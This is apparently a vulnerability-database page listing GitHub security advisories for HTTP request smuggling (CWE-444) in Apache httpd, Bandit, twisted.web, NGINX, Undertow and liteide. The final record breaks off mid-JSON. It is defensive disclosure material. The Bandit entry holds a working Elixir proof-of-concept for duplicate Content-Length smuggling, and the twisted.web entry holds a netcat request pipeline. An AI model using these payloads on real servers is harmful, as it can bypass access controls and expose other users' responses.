Common Weakness Enumeration

CWE-444

Allowed

Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

Abstraction: Base · Status: Incomplete

The product acts as an intermediary HTTP agent (such as a proxy or firewall) in the data flow between two entities such as a client and server, but it does not interpret malformed HTTP requests or responses in ways that are consistent with how the messages will be processed by those entities that are at the ultimate destination.

551 vulnerabilities reference this CWE, most recent first.

GHSA-C4CH-CV96-R58V

Vulnerability from github – Published: 2024-04-04 21:30 – Updated: 2024-11-12 21:30
VLAI
Details

HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker that can inject malicious response headers into backend applications to cause an HTTP desynchronization attack.

Users are recommended to upgrade to version 2.4.59, which fixes this issue.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-24795"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113",
      "CWE-444"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-04-04T20:15:08Z",
    "severity": "MODERATE"
  },
  "details": "HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker that can inject malicious response headers into backend applications to cause an HTTP desynchronization attack.\n\nUsers are recommended to upgrade to version 2.4.59, which fixes this issue.",
  "id": "GHSA-c4ch-cv96-r58v",
  "modified": "2024-11-12T21:30:49Z",
  "published": "2024-04-04T21:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24795"
    },
    {
      "type": "WEB",
      "url": "https://httpd.apache.org/security/vulnerabilities_24.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00013.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/05/msg00014.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I2N2NZEX3MR64IWSGL3QGN7KSRUGAEMF"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LX5U34KYGDYPRH3AJ6MDDCBJDWDPXNVJ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WNV4SZAPVS43DZWNFU7XBYYOZEZMI4ZC"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20240415-0013"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/kb/HT214119"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2024/Jul/18"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2024/04/04/5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C67R-GC9J-2QF7

Vulnerability from github – Published: 2026-05-07 03:46 – Updated: 2026-05-07 03:46
VLAI
Summary
Bandit is vulnerable to CL.CL request smuggling via unrejected duplicate `Content-Length` header
Details

Summary

Bandit is vulnerable to CL.CL HTTP request smuggling: it silently accepts requests with two Content-Length headers whose values differ, takes the first value, and dispatches the body bytes as a second pipelined request on the same keep-alive connection. RFC 9110 §5.3 prohibits multiple lines for singleton fields like Content-Length, and RFC 9112 §6.3 item 5 requires the recipient to treat invalid Content-Length as an unrecoverable framing error. When Bandit sits behind a proxy that picks the last Content-Length and forwards rather than rejects, an unauthenticated attacker can smuggle requests past edge WAF rules, path-based ACLs, rate limiting, and audit logging.

The vulnerability was introduced prior to v0.1.0 (released Nov 5, 2020) on Nov 16, 2019: https://github.com/mtrudel/bandit/commit/e5270b1b19e9f3574aa0f87ec76851d66c38c0af

Details

Bandit.Headers.get_content_length/1 (lib/bandit/headers.ex) calls List.keyfind/3, which returns only the first matching header. Bandit already correctly rejects the comma-separated form (Content-Length: 0, 43) when values differ; the bug is that the multi-line form never reaches that check.

Fix: collect every Content-Length value from the header list and reject unless all values parse and are byte-identical — extending the existing rejection to the multi-line case.

PoC

The script below boots a local Bandit server with a Plug that echoes the dispatched method and path, then sends a POST with Content-Length: 0 followed by Content-Length: 43 and a 43-byte body containing a valid GET /smuggled HTTP/1.1 request line. Run with elixir script.exs

On Bandit 1.10.4 / Elixir 1.18, default config: two 200 OK responses on the same TCP connection. First body method=POST path=/, second body method=GET path=/smuggled. Bandit accepted the malformed request and dispatched the embedded request line as a second request.

Impact

Spec violation that becomes request smuggling when paired with a permissive frontend. Practical impact depends entirely on what sits between the internet and Bandit, not on what runs above it.

The application framework (Phoenix, LiveView, Phoenix-API + React SPA) is irrelevant — smuggled requests still flow through the full Plug pipeline, so application auth still runs. The attacker is someone hitting the API directly with curl, not the SPA.

Real exposure concentrates at boundary controls the proxy enforces and Bandit doesn't see: edge WAF, path-based ACLs at the LB, edge rate limiting, centralized audit logging, and — the only realistic data-exfil path — response-queue desync on pooled upstream connections.

Most major frontends already reject CL.CL (Cloudflare, AWS ALB, current nginx, HAProxy in default strict mode). Realistic exposure: custom proxies, older nginx, in-house API gateways, or multi-hop setups where one hop is permissive.

  • Bandit directly on the internet: spec violation, no exploit.
  • Bandit behind a major CDN/LB: almost certainly safe.
  • Bandit behind a custom or unverified proxy: real smuggling exposure, bounded by what that proxy was enforcing.

Worth fixing regardless — the current behavior silently shifts security responsibility onto whichever proxy is deployed.

Script and Logs

# Bandit HTTP/1 duplicate Content-Length first-wins PoC.
#
# Bandit.Headers.get_content_length/1 calls List.keyfind/3, which returns the
# first Content-Length value and silently ignores additional Content-Length
# entries. RFC 9112 §6.3 explicitly classifies this as an unrecoverable error
# and says the recipient MUST treat it as such.
#
# This is the classic CL.CL request-smuggling primitive. If a fronting proxy
# uses the *last* Content-Length while Bandit uses the first (or vice versa),
# the second "request" embedded in the first request's body gets dispatched
# as a new request on the same keep-alive connection - after the proxy has
# already applied its access controls.
#
# Run: elixir scripts/bandit/http1_duplicate_content_length.exs

Mix.install([
  {:bandit, "~> 1.10"},
  {:plug, "~> 1.19"}
])

defmodule DemoApp do
  @behaviour Plug

  import Plug.Conn

  def init(opts), do: opts

  def call(conn, _opts) do
    send_resp(conn, 200, "method=#{conn.method} path=#{conn.request_path}\n")
  end
end

defmodule Smuggle do
  @port 4321

  def run do
    {:ok, _} = Bandit.start_link(plug: DemoApp, ip: {127, 0, 0, 1}, port: @port)

    request = build_smuggling_request()
    log("Sending #{byte_size(request)}-byte CL.CL request:\n#{request}")

    {:ok, sock} = :gen_tcp.connect(~c"127.0.0.1", @port, [:binary, active: false])
    :ok = :gen_tcp.send(sock, request)

    response = read_all(sock)
    :gen_tcp.close(sock)

    log("Response stream:\n#{response}")
    diagnose(response)
  end

  # POST with two Content-Length headers, plus a smuggled GET line in the
  # body. A CL-last frontend would forward the body bytes; Bandit (CL-first)
  # reads 0 bytes per Content-Length: 0, replies, and the smuggled request
  # line either gets parsed as a new request on the keep-alive connection
  # or stays in the buffer.
  defp build_smuggling_request do
    smuggled_request = "GET /smuggled HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"
    smuggled_size = byte_size(smuggled_request)

    "POST / HTTP/1.1\r\n" <>
      "Host: 127.0.0.1\r\n" <>
      "Content-Length: 0\r\n" <>
      "Content-Length: #{smuggled_size}\r\n" <>
      "\r\n" <>
      smuggled_request
  end

  defp read_all(sock, accumulated \\ "") do
    case :gen_tcp.recv(sock, 0, 2_000) do
      {:ok, bytes} -> read_all(sock, accumulated <> bytes)
      {:error, _reason} -> accumulated
    end
  end

  # Three observable outcomes:
  #   - 400 Bad Request -> RFC-conformant rejection (not what current
  #     Bandit does).
  #   - Two responses, second one for /smuggled -> Bandit dispatched the
  #     smuggled request as a second pipelined request.
  #   - One response -> Bandit accepted Content-Length: 0, the smuggled
  #     bytes sat in the keep-alive buffer; with a CL-last frontend this
  #     becomes a smuggled request on the next request boundary.
  defp diagnose(response) do
    response_lines = Regex.scan(~r/^HTTP\/1\.[01] \d{3}[^\r\n]*/m, response) |> List.flatten()
    log("HTTP/1.x response lines observed: #{length(response_lines)}")
    Enum.each(response_lines, fn line -> log("  #{line}") end)

    cond do
      response =~ ~r/^HTTP\/1\.[01] 400/ ->
        log("OK: Bandit rejected duplicate Content-Length (RFC 9112 §6.3 conformant).")

      response =~ "/smuggled" ->
        log("VULNERABLE: smuggled GET /smuggled was processed as a second request.")

      length(response_lines) == 1 ->
        log("ACCEPTED: Bandit took the first Content-Length (0) and left the")
        log("smuggled request line in the keep-alive buffer. Combined with a")
        log("CL-last frontend this becomes request smuggling.")

      true ->
        log("Inconclusive - see raw response above.")
    end
  end

  defp log(message), do: IO.puts("[#{Time.utc_now() |> Time.truncate(:millisecond)}] #{message}")
end

Smuggle.run()
11:52:23.036 [info] Running DemoApp with Bandit 1.10.4 at 127.0.0.1:4321 (http)
[09:52:23.039] Sending 118-byte CL.CL request:
POST / HTTP/1.1
Host: 127.0.0.1
Content-Length: 0
Content-Length: 43

GET /smuggled HTTP/1.1
Host: 127.0.0.1


[09:52:25.057] Response stream:
HTTP/1.1 200 OK
date: Tue, 28 Apr 2026 09:52:22 GMT
content-length: 19
vary: accept-encoding
cache-control: max-age=0, private, must-revalidate

method=POST path=/
HTTP/1.1 200 OK
date: Tue, 28 Apr 2026 09:52:22 GMT
content-length: 26
vary: accept-encoding
cache-control: max-age=0, private, must-revalidate

method=GET path=/smuggled

[09:52:25.057] HTTP/1.x response lines observed: 2
[09:52:25.057]   HTTP/1.1 200 OK
[09:52:25.057]   HTTP/1.1 200 OK
[09:52:25.058] VULNERABLE: smuggled GET /smuggled was processed as a second request.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Hex",
        "name": "bandit"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39805"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-07T03:46:31Z",
    "nvd_published_at": "2026-05-01T21:16:17Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nBandit is vulnerable to CL.CL HTTP request smuggling: it silently accepts requests with two `Content-Length` headers whose values differ, takes the first value, and dispatches the body bytes as a second pipelined request on the same keep-alive connection. RFC 9110 \u00a75.3 prohibits multiple lines for singleton fields like `Content-Length`, and RFC 9112 \u00a76.3 item 5 requires the recipient to treat invalid `Content-Length` as an unrecoverable framing error. When Bandit sits behind a proxy that picks the *last* `Content-Length` and forwards rather than rejects, an unauthenticated attacker can smuggle requests past edge WAF rules, path-based ACLs, rate limiting, and audit logging.\n\nThe vulnerability was introduced prior to `v0.1.0 (released Nov 5, 2020)` on Nov 16, 2019: https://github.com/mtrudel/bandit/commit/e5270b1b19e9f3574aa0f87ec76851d66c38c0af\n\n### Details\n\n`Bandit.Headers.get_content_length/1` (`lib/bandit/headers.ex`) calls `List.keyfind/3`, which returns only the first matching header. Bandit already correctly rejects the comma-separated form (`Content-Length: 0, 43`) when values differ; the bug is that the multi-line form never reaches that check.\n\n**Fix:** collect every `Content-Length` value from the header list and reject unless all values parse and are byte-identical \u2014 extending the existing rejection to the multi-line case.\n\n### PoC\n\nThe script below boots a local Bandit server with a Plug that echoes the dispatched method and path, then sends a POST with `Content-Length: 0` followed by `Content-Length: 43` and a 43-byte body containing a valid `GET /smuggled HTTP/1.1` request line. Run with `elixir script.exs`\n\nOn Bandit 1.10.4 / Elixir 1.18, default config: two `200 OK` responses on the same TCP connection. First body `method=POST path=/`, second body `method=GET path=/smuggled`. Bandit accepted the malformed request and dispatched the embedded request line as a second request.\n\n### Impact\n\nSpec violation that becomes request smuggling when paired with a permissive frontend. Practical impact depends entirely on what sits between the internet and Bandit, not on what runs above it.\n\nThe application framework (Phoenix, LiveView, Phoenix-API + React SPA) is irrelevant \u2014 smuggled requests still flow through the full Plug pipeline, so application auth still runs. The attacker is someone hitting the API directly with curl, not the SPA.\n\nReal exposure concentrates at boundary controls the proxy enforces and Bandit doesn\u0027t see: edge WAF, path-based ACLs at the LB, edge rate limiting, centralized audit logging, and \u2014 the only realistic data-exfil path \u2014 response-queue desync on pooled upstream connections.\n\nMost major frontends already reject CL.CL (Cloudflare, AWS ALB, current nginx, HAProxy in default strict mode). Realistic exposure: custom proxies, older nginx, in-house API gateways, or multi-hop setups where one hop is permissive.\n\n- Bandit directly on the internet: spec violation, no exploit.\n- Bandit behind a major CDN/LB: almost certainly safe.\n- Bandit behind a custom or unverified proxy: real smuggling exposure, bounded by what that proxy was enforcing.\n\nWorth fixing regardless \u2014 the current behavior silently shifts security responsibility onto whichever proxy is deployed.\n\n### Script and Logs\n\n```elixir\n# Bandit HTTP/1 duplicate Content-Length first-wins PoC.\n#\n# Bandit.Headers.get_content_length/1 calls List.keyfind/3, which returns the\n# first Content-Length value and silently ignores additional Content-Length\n# entries. RFC 9112 \u00a76.3 explicitly classifies this as an unrecoverable error\n# and says the recipient MUST treat it as such.\n#\n# This is the classic CL.CL request-smuggling primitive. If a fronting proxy\n# uses the *last* Content-Length while Bandit uses the first (or vice versa),\n# the second \"request\" embedded in the first request\u0027s body gets dispatched\n# as a new request on the same keep-alive connection - after the proxy has\n# already applied its access controls.\n#\n# Run: elixir scripts/bandit/http1_duplicate_content_length.exs\n\nMix.install([\n  {:bandit, \"~\u003e 1.10\"},\n  {:plug, \"~\u003e 1.19\"}\n])\n\ndefmodule DemoApp do\n  @behaviour Plug\n\n  import Plug.Conn\n\n  def init(opts), do: opts\n\n  def call(conn, _opts) do\n    send_resp(conn, 200, \"method=#{conn.method} path=#{conn.request_path}\\n\")\n  end\nend\n\ndefmodule Smuggle do\n  @port 4321\n\n  def run do\n    {:ok, _} = Bandit.start_link(plug: DemoApp, ip: {127, 0, 0, 1}, port: @port)\n\n    request = build_smuggling_request()\n    log(\"Sending #{byte_size(request)}-byte CL.CL request:\\n#{request}\")\n\n    {:ok, sock} = :gen_tcp.connect(~c\"127.0.0.1\", @port, [:binary, active: false])\n    :ok = :gen_tcp.send(sock, request)\n\n    response = read_all(sock)\n    :gen_tcp.close(sock)\n\n    log(\"Response stream:\\n#{response}\")\n    diagnose(response)\n  end\n\n  # POST with two Content-Length headers, plus a smuggled GET line in the\n  # body. A CL-last frontend would forward the body bytes; Bandit (CL-first)\n  # reads 0 bytes per Content-Length: 0, replies, and the smuggled request\n  # line either gets parsed as a new request on the keep-alive connection\n  # or stays in the buffer.\n  defp build_smuggling_request do\n    smuggled_request = \"GET /smuggled HTTP/1.1\\r\\nHost: 127.0.0.1\\r\\n\\r\\n\"\n    smuggled_size = byte_size(smuggled_request)\n\n    \"POST / HTTP/1.1\\r\\n\" \u003c\u003e\n      \"Host: 127.0.0.1\\r\\n\" \u003c\u003e\n      \"Content-Length: 0\\r\\n\" \u003c\u003e\n      \"Content-Length: #{smuggled_size}\\r\\n\" \u003c\u003e\n      \"\\r\\n\" \u003c\u003e\n      smuggled_request\n  end\n\n  defp read_all(sock, accumulated \\\\ \"\") do\n    case :gen_tcp.recv(sock, 0, 2_000) do\n      {:ok, bytes} -\u003e read_all(sock, accumulated \u003c\u003e bytes)\n      {:error, _reason} -\u003e accumulated\n    end\n  end\n\n  # Three observable outcomes:\n  #   - 400 Bad Request -\u003e RFC-conformant rejection (not what current\n  #     Bandit does).\n  #   - Two responses, second one for /smuggled -\u003e Bandit dispatched the\n  #     smuggled request as a second pipelined request.\n  #   - One response -\u003e Bandit accepted Content-Length: 0, the smuggled\n  #     bytes sat in the keep-alive buffer; with a CL-last frontend this\n  #     becomes a smuggled request on the next request boundary.\n  defp diagnose(response) do\n    response_lines = Regex.scan(~r/^HTTP\\/1\\.[01] \\d{3}[^\\r\\n]*/m, response) |\u003e List.flatten()\n    log(\"HTTP/1.x response lines observed: #{length(response_lines)}\")\n    Enum.each(response_lines, fn line -\u003e log(\"  #{line}\") end)\n\n    cond do\n      response =~ ~r/^HTTP\\/1\\.[01] 400/ -\u003e\n        log(\"OK: Bandit rejected duplicate Content-Length (RFC 9112 \u00a76.3 conformant).\")\n\n      response =~ \"/smuggled\" -\u003e\n        log(\"VULNERABLE: smuggled GET /smuggled was processed as a second request.\")\n\n      length(response_lines) == 1 -\u003e\n        log(\"ACCEPTED: Bandit took the first Content-Length (0) and left the\")\n        log(\"smuggled request line in the keep-alive buffer. Combined with a\")\n        log(\"CL-last frontend this becomes request smuggling.\")\n\n      true -\u003e\n        log(\"Inconclusive - see raw response above.\")\n    end\n  end\n\n  defp log(message), do: IO.puts(\"[#{Time.utc_now() |\u003e Time.truncate(:millisecond)}] #{message}\")\nend\n\nSmuggle.run()\n```\n\n```logs\n11:52:23.036 [info] Running DemoApp with Bandit 1.10.4 at 127.0.0.1:4321 (http)\n[09:52:23.039] Sending 118-byte CL.CL request:\nPOST / HTTP/1.1\nHost: 127.0.0.1\nContent-Length: 0\nContent-Length: 43\n\nGET /smuggled HTTP/1.1\nHost: 127.0.0.1\n\n\n[09:52:25.057] Response stream:\nHTTP/1.1 200 OK\ndate: Tue, 28 Apr 2026 09:52:22 GMT\ncontent-length: 19\nvary: accept-encoding\ncache-control: max-age=0, private, must-revalidate\n\nmethod=POST path=/\nHTTP/1.1 200 OK\ndate: Tue, 28 Apr 2026 09:52:22 GMT\ncontent-length: 26\nvary: accept-encoding\ncache-control: max-age=0, private, must-revalidate\n\nmethod=GET path=/smuggled\n\n[09:52:25.057] HTTP/1.x response lines observed: 2\n[09:52:25.057]   HTTP/1.1 200 OK\n[09:52:25.057]   HTTP/1.1 200 OK\n[09:52:25.058] VULNERABLE: smuggled GET /smuggled was processed as a second request.\n```",
  "id": "GHSA-c67r-gc9j-2qf7",
  "modified": "2026-05-07T03:46:31Z",
  "published": "2026-05-07T03:46:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mtrudel/bandit/security/advisories/GHSA-c67r-gc9j-2qf7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39805"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mtrudel/bandit/commit/f2ca636eb6df385219957e8934e9fc6efa1630d1"
    },
    {
      "type": "WEB",
      "url": "https://cna.erlef.org/cves/CVE-2026-39805.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mtrudel/bandit"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/EEF-CVE-2026-39805"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Bandit is vulnerable to CL.CL request smuggling via unrejected duplicate `Content-Length` header"
}

GHSA-C8M8-J448-XJX7

Vulnerability from github – Published: 2024-07-29 16:33 – Updated: 2025-11-04 16:51
VLAI
Summary
twisted.web has disordered HTTP pipeline response
Details

Summary

The HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.

PoC

  1. Start a fresh Debian container:
docker run --workdir /repro --rm -it debian:bookworm-slim
  1. Install twisted and its dependencies:
apt -y update && apt -y install ncat git python3 python3-pip \
    && git clone --recurse-submodules https://github.com/twisted/twisted \
    && cd twisted \
    && pip3 install --break-system-packages .
  1. Run a twisted.web HTTP server that echos received requests' methods. e.g., the following:
from twisted.web import server, resource
from twisted.internet import reactor

class TheResource(resource.Resource):
    isLeaf = True

    def render_GET(self, request) -> bytes:
        return b"GET"

    def render_POST(self, request) -> bytes:
        return b"POST"

site = server.Site(TheResource())
reactor.listenTCP(80, site)
reactor.run()
  1. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:
(printf 'POST / HTTP/1.1\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nPOST / HTTP/1.1\r\nContent-Length: 0\r\n\r\n'; sleep 1; printf 'GET / HTTP/1.1\r\n\r\n'; sleep 1) | nc localhost 80
  1. Observe that the responses arrive out of order:
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:41 GMT
Content-Length: 5
Content-Type: text/html

POST
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 4
Content-Type: text/html

GET
HTTP/1.1 200 OK
Server: TwistedWeb/24.3.0.post0
Date: Tue, 09 Jul 2024 06:19:42 GMT
Content-Length: 5
Content-Type: text/html

POST

Impact

See GHSA-xc8x-vp79-p3wm. Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 24.3.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "twisted"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "24.7.0rc1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-41671"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-29T16:33:11Z",
    "nvd_published_at": "2024-07-29T15:15:15Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe HTTP 1.0 and 1.1 server provided by twisted.web could process pipelined HTTP requests out-of-order, possibly resulting in information disclosure.\n\n### PoC\n0. Start a fresh Debian container:\n```sh\ndocker run --workdir /repro --rm -it debian:bookworm-slim\n```\n1. Install twisted and its dependencies:\n```sh\napt -y update \u0026\u0026 apt -y install ncat git python3 python3-pip \\\n    \u0026\u0026 git clone --recurse-submodules https://github.com/twisted/twisted \\\n    \u0026\u0026 cd twisted \\\n    \u0026\u0026 pip3 install --break-system-packages .\n```\n2. Run a twisted.web HTTP server that echos received requests\u0027 methods. e.g., the following:\n```python\nfrom twisted.web import server, resource\nfrom twisted.internet import reactor\n\nclass TheResource(resource.Resource):\n    isLeaf = True\n\n    def render_GET(self, request) -\u003e bytes:\n        return b\"GET\"\n\n    def render_POST(self, request) -\u003e bytes:\n        return b\"POST\"\n\nsite = server.Site(TheResource())\nreactor.listenTCP(80, site)\nreactor.run()\n```\n3. Send it a POST request with a chunked message body, pipelined with another POST request, wait a second, then send a GET request on the same connection:\n```sh\n(printf \u0027POST / HTTP/1.1\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n0\\r\\n\\r\\nPOST / HTTP/1.1\\r\\nContent-Length: 0\\r\\n\\r\\n\u0027; sleep 1; printf \u0027GET / HTTP/1.1\\r\\n\\r\\n\u0027; sleep 1) | nc localhost 80\n```\n4. Observe that the responses arrive out of order:\n```\nHTTP/1.1 200 OK\nServer: TwistedWeb/24.3.0.post0\nDate: Tue, 09 Jul 2024 06:19:41 GMT\nContent-Length: 5\nContent-Type: text/html\n\nPOST\nHTTP/1.1 200 OK\nServer: TwistedWeb/24.3.0.post0\nDate: Tue, 09 Jul 2024 06:19:42 GMT\nContent-Length: 4\nContent-Type: text/html\n\nGET\nHTTP/1.1 200 OK\nServer: TwistedWeb/24.3.0.post0\nDate: Tue, 09 Jul 2024 06:19:42 GMT\nContent-Length: 5\nContent-Type: text/html\n\nPOST\n```\n\n### Impact\nSee [GHSA-xc8x-vp79-p3wm](https://github.com/twisted/twisted/security/advisories/GHSA-xc8x-vp79-p3wm). Further, for instances of twisted.web HTTP servers deployed behind reverse proxies that implement connection pooling, it may be possible for remote attackers to receive responses intended for other clients of the twisted.web server.",
  "id": "GHSA-c8m8-j448-xjx7",
  "modified": "2025-11-04T16:51:06Z",
  "published": "2024-07-29T16:33:11Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/twisted/twisted/security/advisories/GHSA-c8m8-j448-xjx7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41671"
    },
    {
      "type": "WEB",
      "url": "https://github.com/twisted/twisted/commit/046a164f89a0f08d3239ecebd750360f8914df33"
    },
    {
      "type": "WEB",
      "url": "https://github.com/twisted/twisted/commit/4a930de12fb67e88fefcb8822104152f42b27abc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/twisted/twisted"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/11/msg00028.html"
    },
    {
      "type": "WEB",
      "url": "https://www.vicarius.io/vsociety/posts/disordered-http-pipeline-in-twistedweb-cve-2024-4167"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "twisted.web has disordered HTTP pipeline response"
}

GHSA-C9VH-3F9G-F2XF

Vulnerability from github – Published: 2022-05-24 17:05 – Updated: 2022-05-24 17:05
VLAI
Details

NGINX before 1.17.7, with certain error_page configurations, allows HTTP request smuggling, as demonstrated by the ability of an attacker to read unauthorized web pages in environments where NGINX is being fronted by a load balancer.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-20372"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-01-09T21:15:00Z",
    "severity": "MODERATE"
  },
  "details": "NGINX before 1.17.7, with certain error_page configurations, allows HTTP request smuggling, as demonstrated by the ability of an attacker to read unauthorized web pages in environments where NGINX is being fronted by a load balancer.",
  "id": "GHSA-c9vh-3f9g-f2xf",
  "modified": "2022-05-24T17:05:58Z",
  "published": "2022-05-24T17:05:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20372"
    },
    {
      "type": "WEB",
      "url": "https://github.com/kubernetes/ingress-nginx/pull/4859"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nginx/nginx/commit/c1be55f97211d38b69ac0c2027e6812ab8b1b94e"
    },
    {
      "type": "WEB",
      "url": "https://bertjwregeer.keybase.pub/2019-12-10%20-%20error_page%20request%20smuggling.pdf"
    },
    {
      "type": "WEB",
      "url": "https://duo.com/docs/dng-notes#version-1.5.4-january-2020"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20200127-0003"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/kb/HT212818"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4235-1"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4235-2"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00013.html"
    },
    {
      "type": "WEB",
      "url": "http://nginx.org/en/CHANGES"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2021/Sep/36"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CCCF-7XW3-P2VR

Vulnerability from github – Published: 2021-04-30 17:28 – Updated: 2022-02-11 21:12
VLAI
Summary
HTTP Request Smuggling in Undertow
Details

A flaw was found in Undertow in versions before 2.1.1.Final, regarding the processing of invalid HTTP requests with large chunk sizes. This flaw allows an attacker to take advantage of HTTP request smuggling.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.1.0.Final"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "io.undertow:undertow-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.1.1.Final"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-10719"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-28T16:37:37Z",
    "nvd_published_at": "2020-05-26T16:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A flaw was found in Undertow in versions before 2.1.1.Final, regarding the processing of invalid HTTP requests with large chunk sizes. This flaw allows an attacker to take advantage of HTTP request smuggling.",
  "id": "GHSA-cccf-7xw3-p2vr",
  "modified": "2022-02-11T21:12:25Z",
  "published": "2021-04-30T17:28:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10719"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10719"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20220210-0014"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "HTTP Request Smuggling in Undertow"
}

GHSA-CF47-C3CP-R84W

Vulnerability from github – Published: 2026-03-24 06:31 – Updated: 2026-03-24 06:31
VLAI
Details

Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in visualfc liteide (liteidex/src/3rdparty/qjsonrpc/src/http-parser modules). This vulnerability is associated with program files http_parser.C.

This issue affects liteide: before x38.4.

Show details on source website

{
  "affected": [],
  "aliases": [
